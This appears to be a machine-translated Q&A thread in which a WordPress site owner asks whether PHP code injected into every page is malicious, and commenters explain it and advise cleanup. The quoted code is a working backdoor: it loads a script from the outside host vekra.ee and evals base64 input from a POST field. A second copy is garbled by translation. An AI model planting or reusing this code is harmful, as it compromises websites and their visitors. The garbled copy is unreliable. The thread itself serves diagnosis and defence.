Fatal编程技术网
  • php/
  • 这个php脚本将做什么?这是恶意php代码吗?

这个php脚本将做什么?这是恶意php代码吗?

php

这个php脚本将做什么?这是恶意php代码吗?,php,Php,有人能告诉我这段php代码会做什么吗?我只在每个.php页面上找到了这段代码。其他页面如js/css/php.ini也可以。这是恶意代码吗?如果是,请建议如何防止恶意活动 代码如下: global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@hea

有人能告诉我这段php代码会做什么吗?我只在每个.php页面上找到了这段代码。其他页面如js/css/php.ini也可以。这是恶意代码吗?如果是,请建议如何防止恶意活动

代码如下:

global $sessdt_o;
if(!$sessdt_o) { 
    $sessdt_o = 1; 
    $sessdt_k = "lb11"; 
    if(!@$_COOKIE[$sessdt_k]) { 
        $sessdt_f = "102"; 
        if(!@headers_sent()) { 
            @setcookie($sessdt_k,$sessdt_f); 
        } else { 
            echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
        } 
    } else { 
        if($_COOKIE[$sessdt_k]=="102") { 
            $sessdt_f = (rand(1000,9000)+1); 
            if(!@headers_sent()) { 
                @setcookie($sessdt_k,$sessdt_f); 
            } else { 
                echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
            } 
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; 
            $sessdt_v = urlencode(strrev($sessdt_j)); 
            $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); 
            echo "<script src='$sessdt_u'></script>"; 
            echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; 
        } 
    } 
    $sessdt_p = "showimg"; 
    if(isset($_POST[$sessdt_p])){ 
        eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
        exit;
    }
}

global$sessdt\o;
如果(!$sessdt_o){
$sessdt_o=1;
$sessdt_k=“lb11”;
如果(!@$\u COOKIE[$sessdt\u k]){
$sessdt_f=“102”;
如果(!@headers_sent()){
@setcookie($sessdt_k,$sessdt_f);
}否则{
echo“document.cookie=”$sessdt_k.=“$sessdt_f.”;”;
} 
}否则{
如果($_COOKIE[$sessdt_k]==“102”){
$sessdt_f=(兰特(10009000)+1);
如果(!@headers_sent()){
@setcookie($sessdt_k,$sessdt_f);
}否则{
echo“document.cookie=”$sessdt_k.=“$sessdt_f.”;”;
} 
$sessdt\u j=@$\u SERVER[“HTTP\u HOST”]。@$\u SERVER[“REQUEST\u URI”];
$sessdt_v=urlencode(strev($sessdt_j));
$sessdt_=”http://vekra.ee/?rnd=“$sessdt_f.substr($sessdt_v,-200);
回声“;

echo“它更有可能将您的每个页面重定向到攻击者的网站。

@
将停止任何错误,因此您无法从此脚本获取任何日志

如果你想让你的网站正常工作,你应该删除它

编辑:它不会重定向,但它会在你的页面上注入它想要的任何东西。
脚本的第二部分检查cookies,它将从他的网站添加一个javascript,可以做恶意的事情

最后一部分我不认为任何人能够猜到它是什么,因为它依赖于一些post变量,这就是
$\u post['showimg']
,我猜他用post攻击了你的网站


要做的事情:更改密码,检查文件的写入权限,它们不应该是
0777
,备份数据库和WordPress模板,删除WordPress安装并从头开始重新安装。在模板中搜索他的代码,然后添加清理过的模板。
我没有仔细检查过,但只检查了行


eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));



已经向我表明,如果不是恶意的,那么非常接近-可能存在代码注入。
您的问题不是代码本身,而是它最初是如何到达那里的。您需要检查文件/文件夹的写入权限,以确保外部没有人可以修改它们


您提到您正在使用wordpress,请阅读有关加强wordpress安全性的内容。我建议您锁定您的博客(如果可行的话)除非你解决了安全问题。
我是一名安全分析师,我相信只有在你没有cookie的情况下,它才会将你重定向到一个可能的恶意网站。如果你已经有cookie,那么脚本会知道你已经在那里,并且可能正在研究恶意软件,因此不会执行重定向。图像可能是就像一个检测调试器预设API。这只是我的意见。
感谢Mihai的回复。我的网站基于最新wp版本的操作系统WordPress 3.2.1。几乎我网站的每个php页面都会受到影响。甚至wp admin+wp-都包括页面。我真的很担心,请建议我现在要做什么。再次感谢您的帮助Mahai,我有php.in我访问了我的服务器并决定使用php.ini禁用函数功能取消一些php库函数,它们是[eval | fopen | fclose | fputs | base64 | decode | is | writable | opendir]等等。请建议它是好的。你是如何得到这段代码的?你的PHP文件在你不知情的情况下被修改了?嗨,阿里,我刚刚打开FileZila FTP,然后发现每个PHP页面最后一次修改是在2011年9月14日上午4:01:14(印度时间)然后我打开文件,发现了这段代码。这真的很奇怪。你的第一行代码让我给出了+1-没有人解决过这个问题。值得一提的是,核心wordpress是安全的,但插件和扩展可能非常不安全,容易受到攻击,包括wordpress主题。